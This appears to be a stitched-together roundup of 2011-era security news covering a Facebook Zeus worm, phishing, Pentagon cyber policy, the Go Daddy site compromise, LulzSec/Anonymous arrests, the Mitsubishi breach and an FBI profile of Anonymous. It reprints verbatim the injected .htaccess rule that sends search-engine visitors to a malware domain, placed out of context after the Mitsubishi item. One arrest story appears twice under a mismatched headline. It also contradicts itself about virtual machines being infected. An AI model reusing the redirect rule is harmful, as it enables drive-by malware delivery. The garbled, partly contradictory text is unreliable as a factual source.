A worm spreading via Facebook infects victims with a variant of the dangerous Zeus Trojan. The attack, which was first found by researchers at CSIS in Denmark, spreads via phony posts from an infected Facebook user's account that pretends to contain photos.
Like previous Facebook scams, it uses stolen account credentials to log in and then spam the victim account's "Friends" with the malicious posts. While a screenshot of the file appears to have a .jpg suffix, it's really a malicious screensaver file, according to Jovi Umawing, a security expert at GFI Software.

"The worm is also found to have anti-VM capabilities, making it useless to execute and test in a virtual environment, such as Oracle VM VirtualBox and VMWare." If you are using any virtual machine then it will infect your current OS.

Facebook has blocked the offending domains spreading the Trojan. "We are constantly monitoring the situation and are in the process of blocking domains as we discover them. We have internal systems in place configured specifically to monitor for variations of the spam and are working with others across the industry to pursue both technical and legal avenues to fight the bug," a Facebook spokesperson says. 

"Facebook is built to easily allow people to share pictures, videos, and other content -- and people trust what they are receiving from their friends," says Mike Geide, senior security researcher at Zscaler ThreatLabZ Malware. "[For example], this recent example can take advantage of the sharing mechanisms and user's trust of their friends within social networking."

Facebook again under massive attack. This time phishing emails are threatening to delete users’ Facebook accounts unless the victims pass along their account details within 24 hours. The phishing messages are charging Facebook users with violating policy regulations by annoying or insulting other Facebook users. The messages are then requesting personal and financial information including Facebook login details and part of recipients’ credit card numbers. The emails are entirely bogus. They are not coming from Facebook. Social media venues would not request financial information, nor would they request login details. The scams are, in fact, designed to steal credit card numbers and social media accounts, likely in order to further spread scams and bilk victims.

"I do not believe that we need new explicit authorities to conduct offensive operations of any kind," Air Force General Robert Kehler said in the latest sign of quickening U.S. military preparations for possible cyber warfare.

"I do not think there is any issue about authority to conduct operations," he added, referring to the legal framework.

But he said the military was still working its way through cyber warfare rules of engagement that lie beyond "area of hostilities," or battle zones, for which they have been approved.

The Strategic Command is responsible for U.S. operations in space and cyberspace. The U.S. Cyber Command, a sub-command, began operating in May 2010 as military doctrine, legal authorities and rules of engagement were still being worked out for what the military calls the newest potential battle "domain."

The Defense Department, in a report made public Tuesday, ratcheted up its warnings, saying the United States reserves the right to retaliate with military force against a cyber attack and is boosting its ability to pinpoint network intruders.

"When warranted, we will respond to hostile attacks in cyberspace as we would to any other threat to our country," the Pentagon said in a report mandated by Congress.

"We reserve the right to use all necessary means - diplomatic, informational, military and economic - to defend our nation, our allies, our partners and our interests."

PRESIDENT MUST ORDER CYBER OFFENSIVE

Kehler, in Wednesday's teleconference, equated offensive action in cyberspace with operations on the ground, air, sea and space in that any offensive action would be carried out under orders of the president as commander-in-chief.

As recently as October 18, Kehler had told reporters that the military was still looking at "what kinds of options would we want to be able to offer" policymakers for cyber warfare.

Deliberations on military doctrine and legal framework are "ongoing," Kehler said at the time. "I would say it's not completed."

On Wednesday, he said the military was learning daily from its operations in cyberspace.

"I think we all wish we were going faster, but we have made progress, we have a number of rules of engagement in place," he said from Omaha, Nebraska, where Strategic Command was hosting a cyber and space conference.

The Pentagon's advanced research arm said earlier this month that it is stepping up efforts to build a cyber arsenal for "more and better options" to meet computer-driven threats to a growing range of industrial and other systems that are vulnerable to cyber penetration.

The Office of the National Counterintelligence Executive, a U.S. intelligence arm, said in a report to Congress last month that China and Russia are using cyber espionage to steal U.S. trade and technology secrets and that they will remain "aggressive" in these efforts.

It defined cyberspace as including the Internet, telecommunications networks, computer systems and embedded processors and controllers in "critical industries."

The Pentagon, in the report to Congress made public Tuesday, said it was seeking to deter aggression in cyberspace by building stronger defenses and by finding ways to make attackers pay a price.

"Should the 'deny objectives' element of deterrence not prove adequate," the report said, "DoD (Department of Defense) maintains, and is further developing, the ability to respond militarily in cyberspace and in other domains."

Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 

Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

FBI Arrests Shevantha Perera Suspected as LulzSec and Anonymous Hacker
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI  arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.


The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.

Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites.Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.

FBI Arrests Suspected LulzSec and Anonymous Hackers
Search warrants were also being executed in New Jersey, Minnesota and Montana. The FBI  arrested two alleged members of the hacking collectives LulzSec and Anonymous on Thursday morning in San Francisco and Phoenix, According to Fox news. The suspected hacker arrested in California is homeless and alleged to have been involved in the hacking of Santa Cruz County government websites.


The person arrested in Arizona is a student at a technical university and allegedly participated in the widely publicized hack against Sony. Both groups have been targeted by the FBI and international law enforcement agencies in recent months.

Meanwhile, the FBI arrested an alleged Anonymous member in San Francisco. The man, who is reported to be homeless, is said to have been involved in internet attacks against Santa Cruz County government websites.Just because a man is homeless, of course, doesn't mean that he can't get an internet connection. Coffee houses, cafes, libraries, etc can all offer cheap or free internet access - and because the computer being used can be a shared device, it may be harder to identify who might have been responsible for an attack compared to a PC at a home.

Mitsubishi Heavy Industries, Japan's biggest defense contractor, has revealed that it suffered a hacker attack in August that caused some of its networks to be infected by malware. The firm - which is involved in a wide range of activities including space rockets, the production of jet fighters, shipbuilding, and running nuclear power plants - said that 45 network servers and 38 PCs became infected with malware at ten facilities across Japan.
The infected sites included its submarine manufacturing plant in Kobe and the Nagoya Guidance & Propulsion System Works, which makes engine parts for missiles.
The Japanese newspaper Yomiuri claimed that at least eight different pieces of malware, including some which stole data, were discovered at Mitsubishi sites. A Mitsubishi spokesperson, however, was quoted as saying that "there is no possibility of any leakage of defense-related information at this point."
The company first noticed the attack on August 11th, and expects to have the results of an investigation into the security breach by the end of September.
If Mitsubishi Heavy Industries was targeted by hackers, the obvious question to ask is who was behind the attack and what was the motive?

This is caused by this entry that is added to the .htaccess file of the compromised sites:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L]

According to a PDF containing what purports to be a leaked psychological assessment of the leaders of LulzSec and Anonymous by the FBI's Behavioral Science Unit (which also profiles serial killers), Anonymous is not only not a collection of individuals, it's a coherent group that poses a threat to national security.
Neither the FBI nor Dept. of Homeland Security have commented on the "leak," which may be a fake according to the TechHerald, but seems to reflect accurately the thinking behind a series of DHS warning bulletins and crackdowns that have resulted in 75 raids and 16 arrests of Anonymous members just this year.
Anons themselves refer to the group as a rough, almost coincidental collective of individuals that occasionally cooperate on projects to protest specific things. There are approximately eight vortices of special interest within the collective, according to interviews, postings and counter-arguments posted by various Anonymi in response to invective by those it attacked. 
Attacks are the work of small groups of interested individuals who, on their own initiative and using public argument as their weapon, gather like-minded Anonymi to protest governmental outrages or attack injustice in whatever form they find it, according to de facto leaders in the non-existent but vocal#OPpublicrelations.
In March, for example, members of Anonymous and 4Chan debated, in the finest traditions of American Democracy and citizen activism, whether to attack and defeat the Internet scourge that is Rebecca Black – the annoying but harmless pop "singer" whose made herself famous with a mom-and-dad-funded music video on YouTube that repeated the same lyrics so often it became apparent those might be the only words she knows.(Other, less world-shaking Anonymous projects resulted in significant attacks against the embattled governments of Egypt and Syria, the exposure of government atrocities in Bolivia, civil protest against censorship on the Bay Area Rapid Transit System, attacks on Visa, Mastercard and Paypal in support of whistleblower site WikiLeaks and a long-simmering, high-profile protest against unrestricted greed, corrosive dishonesty of Wall Street and the and economic destruction from which the rest of the country suffers while financiers continues to prosper.)
The FBI has analyzed various instant messages, forum postings, emails, Twitter posts and other documentation and decided Anonymous behaves more like a coherent organization led by a small number of powerful and focused activists, not a politically involved group of individuals using the Anonymous banner as gathering point.

"Anonymous is not a group, it does not have leaders, people can do ANYTHING under the flag of their country," according to one member in an email interview with the AP. "Anything can be a threat to National Security, really," the member said in an email interview. "Any hacker group can be."
If the document is real, it ends on a disturbingly dangerous and presumptive conclusion: that attacks and protests by Anonymous will eventually lead to the death of members of Anonymous, law enforcement or the public that will drive many supporters away from Anonymous.
Until then, Anonymous, whether collectively or individually, may be unstoppable in practical terms.